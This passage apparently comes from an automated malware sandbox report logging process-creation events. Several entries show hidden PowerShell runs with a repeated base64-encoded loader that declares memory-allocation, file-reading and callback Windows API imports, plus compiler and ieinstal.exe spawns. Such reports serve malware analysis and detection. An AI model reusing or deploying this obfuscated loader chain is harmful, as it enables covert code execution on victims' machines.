yAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdlineJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArAC